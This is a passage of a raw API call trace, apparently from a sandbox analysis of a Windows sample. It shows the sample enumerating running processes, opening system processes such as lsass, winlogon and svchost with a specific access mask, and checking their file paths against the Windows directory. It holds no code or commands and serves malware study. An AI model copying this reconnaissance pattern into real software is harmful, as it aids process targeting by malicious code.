ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.170] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0124.170] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0124.171] GetCurrentProcessId () returned 0xf00 [0124.171] GetCurrentProcess () returned 0xffffffff [0124.171] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.171] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x198) returned 0x0 [0124.171] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0124.171] GetCurrentProcessId () returned 0xf00 [0124.171] GetCurrentProcess () returned 0xffffffff [0124.171] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.171] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0124.171] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0124.172] GetCurrentProcessId () returned 0xf00 [0124.172] GetCurrentProcess () returned 0xffffffff [0124.172] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.172] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0124.172] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0124.172] GetCurrentProcessId () returned 0xf00 [0124.172] GetCurrentProcess () returned 0xffffffff [0124.172] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.173] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x220) returned 0x0 [0124.173] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0124.173] GetCurrentProcessId () returned 0xf00 [0124.173] GetCurrentProcess () returned 0xffffffff [0124.173] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.173] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0124.173] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0124.174] GetCurrentProcessId () returned 0xf00 [0124.174] GetCurrentProcess () returned 0xffffffff [0124.174] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.174] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x244) returned 0x0 [0124.174] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.174] GetCurrentProcessId () returned 0xf00 [0124.174] GetCurrentProcess () returned 0xffffffff [0124.174] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.174] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2a4) returned 0x0 [0124.174] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0124.175] GetCurrentProcessId () returned 0xf00 [0124.175] GetCurrentProcess () returned 0xffffffff [0124.175] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.175] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0124.175] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0124.175] GetCurrentProcessId () returned 0xf00 [0124.175] GetCurrentProcess () returned 0xffffffff [0124.175] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.176] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2b4) returned 0x0 [0124.176] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.176] GetCurrentProcessId () returned 0xf00 [0124.176] GetCurrentProcess () returned 0xffffffff [0124.176] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.176] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0124.176] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0124.177] GetCurrentProcessId () returned 0xf00 [0124.177] GetCurrentProcess () returned 0xffffffff [0124.177] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.177] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0124.177] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5d, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.177] GetCurrentProcessId () returned 0xf00 [0124.177] GetCurrentProcess () returned 0xffffffff [0124.177] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.177] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0124.177] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.178] GetCurrentProcessId () returned 0xf00 [0124.178] GetCurrentProcess () returned 0xffffffff [0124.178] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.178] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0 [0124.178] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.179] GetCurrentProcessId () returned 0xf00 [0124.179] GetCurrentProcess () returned 0xffffffff [0124.179] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.179] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3d8) returned 0x0 [0124.179] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.179] GetCurrentProcessId () returned 0xf00 [0124.179] GetCurrentProcess () returned 0xffffffff [0124.179] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.179] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0124.179] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.180] GetCurrentProcessId () returned 0xf00 [0124.180] GetCurrentProcess () returned 0xffffffff [0124.180] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.180] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x350) returned 0x0 [0124.180] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.180] GetCurrentProcessId () returned 0xf00 [0124.180] GetCurrentProcess () returned 0xffffffff [0124.180] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.180] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x434) returned 0x0 [0124.180] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.181] GetCurrentProcessId () returned 0xf00 [0124.181] GetCurrentProcess () returned 0xffffffff [0124.181] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.181] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x554) returned 0x0 [0124.181] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.182] GetCurrentProcessId () returned 0xf00 [0124.182] GetCurrentProcess () returned 0xffffffff [0124.182] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.182] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x590) returned 0x0 [0124.182] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.182] GetCurrentProcessId () returned 0xf00 [0124.183] GetCurrentProcess () returned 0xffffffff [0124.183] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.183] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x598) returned 0x0 [0124.183] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.183] GetCurrentProcessId () returned 0xf00 [0124.183] GetCurrentProcess () returned 0xffffffff [0124.183] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.183] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5b0) returned 0x0 [0124.183] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0124.184] GetCurrentProcessId () returned 0xf00 [0124.184] GetCurrentProcess () returned 0xffffffff [0124.184] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.184] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5e8) returned 0x0 [0124.184] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.184] GetCurrentProcessId () returned 0xf00 [0124.184] GetCurrentProcess () returned 0xffffffff [0124.184] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.184] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x69c) returned 0x0 [0124.184] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0124.185] GetCurrentProcessId () returned 0xf00 [0124.185] GetCurrentProcess () returned 0xffffffff [0124.185] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.185] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6bc) returned 0x0 [0124.185] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0124.185] GetCurrentProcessId () returned 0xf00 [0124.185] GetCurrentProcess () returned 0xffffffff [0124.186] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.186] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x708) returned 0x508 [0124.186] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")) returned 0x1e [0124.186] StrStrIW (lpFirst="C:\\Windows\\System32\\sihost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\sihost.exe" [0124.186] CloseHandle (hObject=0x508) returned 1 [0124.186] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.186] GetCurrentProcessId () returned 0xf00 [0124.187] GetCurrentProcess () returned 0xffffffff [0124.187] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.187] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x720) returned 0x508 [0124.187] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0124.187] StrStrIW (lpFirst="C:\\Windows\\System32\\svchost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\svchost.exe" [0124.187] CloseHandle (hObject=0x508) returned 1 [0124.187] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0124.187] GetCurrentProcessId () returned 0xf00 [0124.187] GetCurrentProcess () returned 0xffffffff [0124.187] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.187] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x7a0) returned 0x508 [0124.187] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0124.188] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0124.188] CloseHandle (hObject=0x508) returned 1 [0124.188] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0124.188] GetCurrentProcessId () returned 0xf00 [0124.188] GetCurrentProcess () returned 0xffffffff [0124.188] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.188] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0124.189] GetCurrentProcessId () returned 0xf00 [0124.189] GetCurrentProcess () returned 0xffffffff [0124.189] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.189] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x818) returned 0x0 [0124.189] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0124.189] GetCurrentProcessId () returned 0xf00 [0124.190] GetCurrentProcess () returned 0xffffffff [0124.190] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.190] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0124.190] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0124.190] GetCurrentProcessId () returned 0xf00 [0124.190] GetCurrentProcess () returned 0xffffffff [0124.190] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.190] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x8a0) returned 0x0 [0124.190] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0124.191] GetCurrentProcessId () returned 0xf00 [0124.191] GetCurrentProcess () returned 0xffffffff [0124.191] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.191] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb3c) returned 0x508 [0124.191] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" (normalized: "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe")) returned 0x4f [0124.191] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" [0124.191] CloseHandle (hObject=0x508) returned 1 [0124.191] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, 